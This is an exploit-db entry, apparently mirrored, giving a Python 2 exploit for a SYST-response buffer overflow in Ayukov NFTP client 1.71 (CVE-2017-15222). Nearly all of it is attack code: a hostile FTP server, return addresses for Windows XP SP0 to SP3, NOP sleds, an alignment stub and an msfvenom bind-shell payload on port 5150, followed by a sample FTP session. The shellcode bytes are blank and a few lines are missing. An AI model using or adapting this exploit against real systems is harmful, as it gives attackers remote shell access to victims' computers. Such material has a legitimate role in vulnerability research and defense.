Ayukov NFTP client 1.71 – ‘SYST’ Buffer Overflow

  • 作者: SYANiDE
    日期: 2019-11-04
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/47576/
  • # Exploit Title: Ayukov NFTP client 1.71 -'SYST' Buffer Overflow
    # Date: 2019-11-03
    # Exploit Author: Chase Hatch (SYANiDE)
    # Vendor Homepage: http://ayukov.com/nftp/
    # Software Link: ftp://ftp.ayukov.com/pub/nftp/nftp-1.71-i386-win32.exe
    # Version: 1.71
    # Tested on: Windows XP Pro SP0, SP1, SP2, SP3
    # CVE : https://nvd.nist.gov/vuln/detail/CVE-2017-15222
    # Steps to reproduce:
    # Run the server with the valid Windows version
    # Connect the client to the malicious server
    # bind shell on port 5150
    #!/usr/bin/env python2
    import os, sys, socket
    NARGS = len(sys.argv)
    # ntdll.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
    # kernel32.dll # dllcharacteristics flags: 0x0 (ASLR=no, DEP=no, SEH=yes)
    # 7C923A95 FFD6CALL ESI	# Windows XP Pro SP3; ntdll.dll
    # 7C927543 FFD6CALL ESI		# Windows XP Pro SP2; ntdll.dll
    # 77E641C7 FFE6JMP ESI		# Windows XP Pro SP1; kernel32.dll
    # 77E667F3 FFE6JMP ESI		# Windows XP Pro SP0: kernel32.dll
    tourRETs = {
    	"XPProSP3": "\x95\x3A\x92\x7c",
    	"XPProSP2": "\x43\x75\x92\x7C",
    	"XPProSP1": "\xc7\x41\xe6\x77",
    	"XPProSP0": "\xf3\x67\xe6\x77"
    if not NARGS > 1:
    	print("USAGE: %s version" % sys.argv[0])
    	print("[.] version must be in:")
    	for item in tourRETs:
    		print("\t%s" % item)
    # sploit = "A"*5000# crash!in SYST cmd, 41414141 in EIP and EBP
    # ESP and ESI both pointers to somewhere in the As
    #If I increase the overflow string to 10000, the area ESP points to at crash
    #, goes from 864 bytes of uninterrupted \x41's to roughly 4056 bytes.
    # sploit = "A"*10000
    # sploit = sys.argv[1]# $(`locate pattern_create.rb|head -n 1` 10000) # 46326846 in EIP
    # `locate pattern_offset.rb |head -n 1` 46326846 10000# 4116
    sploit = "A"*4116
    # Add the return address
    	sploit +=tourRETs[sys.argv[1]]
    except KeyError, x:
    	print("[!] Version %s: not a valid version!Possibly bad capitalization" % str(x))
    sploit += ("\x90"*12)# original calcs based on RET*4... oops. realign.
    # echo "ibase=16;obase=10;0247CED1 - 0247C834" |bc# 0x69D (1693); ESP-ESI
    sploit += "\x90"*1693 # leaves 16 nops at jmp/call target before Cs
    # badchars = "\x00\x0a\x0d"
    # locate EIP and align ESP to a close future 4 and 16 byte boundary
    NOTES = """\
    $-37 > D9EE FLDZ
    $-35 > D97424 F4FSTENV (28-BYTE) PTR SS:[ESP-C]
    $-31 > 59 POP ECX
    $-30 > 80C1 09ADD CL,9
    $-2D > 80C1 04ADD CL,4
    $-2A > 80C1 2AADD CL,2A
    $-27 > 80C5 01ADD CH,1
    $-24 > 51 PUSH ECX
    $-23 > 5C POP ESP
    sploit += "\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xc1\x09\x80\xc1\x04" #13 bytes
    sploit += "\x80\xc1\x2a\x80\xc5\x01\x51\x5c" # 8 bytes
    sploit += "\x90" * 0x22# ESP = EIP
    sploit += "\x90" * 20# sled for shikata_ga_nai unpack
    # msfvenom -p windows/shell_bind_tcp LPORT=5150 EXITFUNC=process 
    # -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -i 1 -f c
    sploit += (
    ) # 355
    sploit += "C" * (10000 - 4116 - 4 - 12 - 1693 - 13 - 8 - 0x22 - 355 - 20)
    cases = {
    	"USER": "331 user OK. Pass required",
    	"PASS": "230 OK, current directory is /",
    	# "SYST": "215 UNIX Type: L8",
    	"SYST": sploit,		# CRASH! in response to SYST cmd/request, w/"A"*5000, 41414141 in EIP and EBP
    	"TYPE": "200 TYPE is whatever was just requested... \"yeah, ok\"",
    	"SITE UMASK": "500 SITE UMASK is an unknown extension",
    	"CWD": "250 OK, current directory whatever you think it is",
    	"PORT": "200 PORT command successful",
    	"PASV": "227 Entering PASV mode",
    	"LIST": "150 Connecting to whatever port.\r\n226 ASCII\r\n226 Options: -a -l\r\n226 3 matches total"
    sx = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    print("[.] Standing up HostileFTPd v0.0 alpha, port 21")
    cx,addr = sx.accept()
    print("[!] Connection received from %s" % str(addr))
    cx.send("220 HostileFTPd v0.0 alpha !\r\n")
    notified = 0
    while True:	
    	req = cx.recv(1024)
    	for key, resp in cases.items():
    		if key in req:
    			cx.send(resp + "\r\n")
    		if "SITE UMASK" in req and notified == 0:
    			print("[!]Buffer sent.Bind shell on client's port 5150?")
    			notified = 1
    		if "PASV" in req:
    			justpause = raw_input("[.] PASV received.Pausing recv buffer")
    ### followed TCP stream in normal client connect to ftp server
    220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 1 of 50 allowed.
    220-Local time is now 13:47. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 15 minutes of inactivity.
    USER bozo
    331 User bozo OK. Password required
    PASS theclown
    230-User bozo has group access to:1003
    230 OK. Current directory is /
    215 UNIX Type: L8
    TYPE I
    200 TYPE is now 8-bit binary
    SITE UMASK 022
    500 SITE UMASK is an unknown extension
    CWD /
    250 OK. Current directory is /
    227 Entering Passive Mode (192,168,56,181,183,29)
    LIST -a
    150 Accepted data connection
    226-Options: -a -l 
    226 3 matches total